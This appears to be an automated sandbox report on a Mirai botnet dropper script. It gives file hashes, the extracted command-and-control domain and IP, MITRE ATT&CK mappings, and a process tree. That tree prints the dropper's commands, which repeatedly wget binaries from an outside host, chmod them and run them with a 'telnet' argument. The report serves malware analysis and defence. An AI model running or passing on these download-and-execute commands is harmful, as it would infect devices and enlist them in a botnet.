mirai | bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa

Analysis

max time kernel
134s
max time network
143s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
18-12-2024 13:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

676B
MD5

5b3ceaec7a3ad11b45f5fca1b603d939
SHA1

5e5ee3fa232288f77e670c66d8ca42c0cc171e45
SHA256

bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa
SHA512

47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215

Score

10^/10

mirai botnet botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

boats.dogmuncher.xyz

89.190.156.145

Extracted

Family

mirai

Botnet

BOTNET

89.190.156.145

boats.dogmuncher.xyz

Extracted

Family

mirai

Botnet

BOTNET

boats.dogmuncher.xyz

89.190.156.145

Extracted

Family

mirai

89.190.156.1

89.190.156.145

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
758	chmod
766	chmod
770	chmod
791	chmod
746	chmod
754	chmod
762	chmod
774	chmod
783	chmod
737	chmod

Deletes itself 1 IoCs

pid	Process
748	kqibeps

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/wkb86	738	wkb86
/tmp/kqibeps	747	kqibeps
/tmp/bojwsl	755	bojwsl
/tmp/njvwa4	759	njvwa4
/tmp/ngwa5	763	ngwa5
/tmp/woega6	767	woega6
/tmp/fnkea7	771	fnkea7
/tmp/gnjqwpc	776	gnjqwpc
/tmp/wlw68k	785	wlw68k
/tmp/wrjkngh4	792	wrjkngh4

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	httpd	747	kqibeps

Reads runtime system information 56 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/11/cmdline	kqibeps
File opened for reading	/proc/15/cmdline	kqibeps
File opened for reading	/proc/37/cmdline	kqibeps
File opened for reading	/proc/372/cmdline	kqibeps
File opened for reading	/proc/668/cmdline	kqibeps
File opened for reading	/proc/386/cmdline	kqibeps
File opened for reading	/proc/2/cmdline	kqibeps
File opened for reading	/proc/17/cmdline	kqibeps
File opened for reading	/proc/78/cmdline	kqibeps
File opened for reading	/proc/111/cmdline	kqibeps
File opened for reading	/proc/332/cmdline	kqibeps
File opened for reading	/proc/13/cmdline	kqibeps
File opened for reading	/proc/36/cmdline	kqibeps
File opened for reading	/proc/5/cmdline	kqibeps
File opened for reading	/proc/10/cmdline	kqibeps
File opened for reading	/proc/360/cmdline	kqibeps
File opened for reading	/proc/18/cmdline	kqibeps
File opened for reading	/proc/12/cmdline	kqibeps
File opened for reading	/proc/83/cmdline	kqibeps
File opened for reading	/proc/177/cmdline	kqibeps
File opened for reading	/proc/673/cmdline	kqibeps
File opened for reading	/proc/14/cmdline	kqibeps
File opened for reading	/proc/21/cmdline	kqibeps
File opened for reading	/proc/359/cmdline	kqibeps
File opened for reading	/proc/9/cmdline	kqibeps
File opened for reading	/proc/70/cmdline	kqibeps
File opened for reading	/proc/75/cmdline	kqibeps
File opened for reading	/proc/3/cmdline	kqibeps
File opened for reading	/proc/4/cmdline	kqibeps
File opened for reading	/proc/22/cmdline	kqibeps
File opened for reading	/proc/71/cmdline	kqibeps
File opened for reading	/proc/77/cmdline	kqibeps
File opened for reading	/proc/74/cmdline	kqibeps
File opened for reading	/proc/82/cmdline	kqibeps
File opened for reading	/proc/660/cmdline	kqibeps
File opened for reading	/proc/76/cmdline	kqibeps
File opened for reading	/proc/20/cmdline	kqibeps
File opened for reading	/proc/72/cmdline	kqibeps
File opened for reading	/proc/81/cmdline	kqibeps
File opened for reading	/proc/125/cmdline	kqibeps
File opened for reading	/proc/235/cmdline	kqibeps
File opened for reading	/proc/6/cmdline	kqibeps
File opened for reading	/proc/7/cmdline	kqibeps
File opened for reading	/proc/8/cmdline	kqibeps
File opened for reading	/proc/19/cmdline	kqibeps
File opened for reading	/proc/23/cmdline	kqibeps
File opened for reading	/proc/375/cmdline	kqibeps
File opened for reading	/proc/487/cmdline	kqibeps
File opened for reading	/proc/160/cmdline	kqibeps
File opened for reading	/proc/24/cmdline	kqibeps
File opened for reading	/proc/126/cmdline	kqibeps
File opened for reading	/proc/154/cmdline	kqibeps
File opened for reading	/proc/328/cmdline	kqibeps
File opened for reading	/proc/333/cmdline	kqibeps
File opened for reading	/proc/16/cmdline	kqibeps
File opened for reading	/proc/69/cmdline	kqibeps

Writes file to tmp directory 10 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/woega6	wget
File opened for modification	/tmp/wlw68k	wget
File opened for modification	/tmp/wkb86	wget
File opened for modification	/tmp/kqibeps	wget
File opened for modification	/tmp/bojwsl	wget
File opened for modification	/tmp/njvwa4	wget
File opened for modification	/tmp/ngwa5	wget
File opened for modification	/tmp/fnkea7	wget
File opened for modification	/tmp/gnjqwpc	wget
File opened for modification	/tmp/wrjkngh4	wget

/tmp/wget.sh
/tmp/wget.sh
1⤵
PID:713
- /usr/bin/wget
  wget http://stop.eye-network.ru/wkb86
  2⤵
  - Writes file to tmp directory
  PID:716
- /bin/chmod
  chmod +x systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/wkb86
  ./wkb86 telnet
  2⤵
  - Executes dropped EXE
  PID:738
- /usr/bin/wget
  wget http://stop.eye-network.ru/kqibeps
  2⤵
  - Writes file to tmp directory
  PID:741
- /bin/chmod
  chmod +x kqibeps systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/kqibeps
  ./kqibeps telnet
  2⤵
  - Deletes itself
  - Executes dropped EXE
  - Changes its process name
  - Reads runtime system information
  PID:747
- /usr/bin/wget
  wget http://stop.eye-network.ru/bojwsl
  2⤵
  - Writes file to tmp directory
  PID:750
- /bin/chmod
  chmod +x bojwsl systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/bojwsl
  ./bojwsl telnet
  2⤵
  - Executes dropped EXE
  PID:755
- /usr/bin/wget
  wget http://stop.eye-network.ru/njvwa4
  2⤵
  - Writes file to tmp directory
  PID:757
- /bin/chmod
  chmod +x bojwsl njvwa4 systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/njvwa4
  ./njvwa4 telnet
  2⤵
  - Executes dropped EXE
  PID:759
- /usr/bin/wget
  wget http://stop.eye-network.ru/ngwa5
  2⤵
  - Writes file to tmp directory
  PID:761
- /bin/chmod
  chmod +x bojwsl ngwa5 njvwa4 systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86
  2⤵
  - File and Directory Permissions Modification
  PID:762
- /tmp/ngwa5
  ./ngwa5 telnet
  2⤵
  - Executes dropped EXE
  PID:763
- /usr/bin/wget
  wget http://stop.eye-network.ru/woega6
  2⤵
  - Writes file to tmp directory
  PID:765
- /bin/chmod
  chmod +x bojwsl ngwa5 njvwa4 systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86 woega6
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/woega6
  ./woega6 telnet
  2⤵
  - Executes dropped EXE
  PID:767
- /usr/bin/wget
  wget http://stop.eye-network.ru/fnkea7
  2⤵
  - Writes file to tmp directory
  PID:769
- /bin/chmod
  chmod +x bojwsl fnkea7 ngwa5 njvwa4 systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86 woega6
  2⤵
  - File and Directory Permissions Modification
  PID:770
- /tmp/fnkea7
  ./fnkea7 telnet
  2⤵
  - Executes dropped EXE
  PID:771
- /usr/bin/wget
  wget http://stop.eye-network.ru/gnjqwpc
  2⤵
  - Writes file to tmp directory
  PID:773
- /bin/chmod
  chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86 woega6
  2⤵
  - File and Directory Permissions Modification
  PID:774
- /tmp/gnjqwpc
  ./gnjqwpc telnet
  2⤵
  - Executes dropped EXE
  PID:776
- /usr/bin/wget
  wget http://stop.eye-network.ru/wlw68k
  2⤵
  - Writes file to tmp directory
  PID:779
- /bin/chmod
  chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86 wlw68k woega6
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /tmp/wlw68k
  ./wlw68k telnet
  2⤵
  - Executes dropped EXE
  PID:785
- /usr/bin/wget
  wget http://stop.eye-network.ru/wrjkngh4
  2⤵
  - Writes file to tmp directory
  PID:789
- /bin/chmod
  chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-cf8f1ab7d84f48e197d323eae0df3dc0-systemd-timedated.service-lsiMCm wget.sh wkb86 wlw68k woega6 wrjkngh4
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/wrjkngh4
  ./wrjkngh4 telnet
  2⤵
  - Executes dropped EXE
  PID:792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/bojwsl

Filesize
209KB

MD5
901565495bd736c186e19bcf63f9d6d0

SHA1
0156d815e43459f529a8e1cb131f33b35c2bc389

SHA256
19e20910c5b4daf752d3f07df71bf95312b857ad5f4ee00c1f6a383c3413e099

SHA512
e148d65c398fb792449734ef9da6813dfa4062f24f4e1ff504094012684fa094012021ab613946e169062c107d6605d191a161925f1583fc8673ed61b6fef77c

Download Submit
/tmp/fnkea7

Filesize
211KB

MD5
cc46ad336ea582beb1e6bf06871efccb

SHA1
bf95a69fa2704c2cadd2de7fedd6b573489f8a3e

SHA256
db7fedf7dc012292b4490f3c526c2f3f8dbbc5542da74551f8f0ec15bab3a01d

SHA512
1206b0e0c79ad1d0e7a77b9a16b1afded0e19198fd3df094524b0688fa7a168511fc055d58d4f7957fc1c035ef2d1fa4251ce74146b04b1fb4fcdcaeba2c5cb1

Download Submit
/tmp/gnjqwpc

Filesize
158KB

MD5
65679cbca61800b0d5e8824408b318c4

SHA1
4c5fca0a6ac37a24463c9b5fa1319c8f80e3f1f5

SHA256
e6e10d2701e51f85f413e188b8139554704536e6e40f462b6cca0693e9cf0eff

SHA512
0acd6c8c7a7ecbe6a0e122c3f988d1d4938c765027234e5d8370676b078c871644b8ddb3db6e12016da4806ff93b748c6b7dd1a0e15366ba14b978edf90ad94c

Download Submit
/tmp/kqibeps

Filesize
206KB

MD5
c2728c3969fbcb7e59700b7f6bb997db

SHA1
af85cd16b5a1f2623a738b4fb0b422512c504ff4

SHA256
e78b085f11226c1acaba5efe9d2d5b60dab6d4043cb49d1a27dd332166a5e70d

SHA512
2c68775f9d5da1e1e678fecab7c28558e2c1aaaa2436ca2d6d176fc50c832be232027b7fa8fa490a822cbe630bb724263ac1f764ff0b57345926f9954dacf5f3

Download Submit
/tmp/ngwa5

Filesize
154KB

MD5
f54eef0f2a2b3d1b95d027e2f9fc075b

SHA1
9808f95f07348a1e62b9986ed35ff332f60010b6

SHA256
6f062123d1fa8fb843406f71d2bf782017dad159aea3e23fc98543923c0c2bad

SHA512
d382986c74a44bd247f3c51d45a1fee5d13746500662e5dbca6d30cd113f89deb1c391b4855e233b645c1690a8d10b09acde0e4b63580b1c8c695be8bdaffa8e

Download Submit
/tmp/njvwa4

Filesize
158KB

MD5
3d9f94b86edde676d3241c1707c965cb

SHA1
b7121399cf77d48c48b2a256b8df1f3579603239

SHA256
05ce105f8c50cc8ad232fb7e55d253713a438b08c38735bfea18f04fda288924

SHA512
021558a83495e651baca0e7874f78886b3dc3e3d20e505f7ec826effad8b21ebdb29a5343bbdb01170eefa32277fbeda801b29f8bf30d6812b4abeea652bc61b

Download Submit
/tmp/wkb86

Filesize
113KB

MD5
5f33f958945dce126f4f18ee23b09162

SHA1
11bb26bd016673b201bf56c61087e6727736a971

SHA256
ae156529ee59ea9218d3bbb7760d536e8becff7ff55659f9b723fcdfb1fa7726

SHA512
e96b2b90261b4d7eeb16f9698c83a920a43853cd5d7cff7aae8d2a03fd5e88f7a344437740e6efe22cf789cd9ca29e05328673f49527643a2c13dc0ceb250ef3

Download Submit
/tmp/wlw68k

Filesize
175KB

MD5
fc93b0974c9c1fd3179c2bc5714bb203

SHA1
aea0232bb853b329ce85fc04552bcfb67cb897fa

SHA256
6f83e2edcb9d60d48a3a005edc0b34daea54de05e13cd72d841a7f36a34780c8

SHA512
998f8f5521fe9e7b3394f51bc589304c02447952ed28a6f75dfb8ab328957f7466fd84cc4c482b764d1e80dc454e1bb4eaf0cd5588d323d99c97f034cc7832fd

Download Submit
/tmp/woega6

Filesize
166KB

MD5
b62613f0cd94e7252a6ec8f452b2ee14

SHA1
a72e04a7230ee9d505b29386640e8d442d5ee209

SHA256
67c705c47fdbb971ad5500dc566409584187c846dc3336c70cd000b07b77a3cf

SHA512
760f5f3560215153695f3ca39c836b0b7f18c552f6eb93bf9063b22ead6fefa39f1d1995af5ae0bd5f8bd0d5bbb82d1b639d1512ff64c57ae96dd81d51ae39ba

Download Submit
/tmp/wrjkngh4

Filesize
142KB

MD5
6c93d778ab9bbcf70e0cd1f6966be42f

SHA1
85f235c84a56d4bac89f0b94db1786b374ef0d40

SHA256
4e92d2333051f2abd221547d29643d6d7c23b5a30fd84177ebd2b39544338e6f

SHA512
b79bc19f4f4a2c5a3f4f286ef73edb198aef8110b52f39146dc850f25a41cf06d33a743a9035945c92dd0a78d91e742c21962c10191f14869a6ee22840ae5549

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads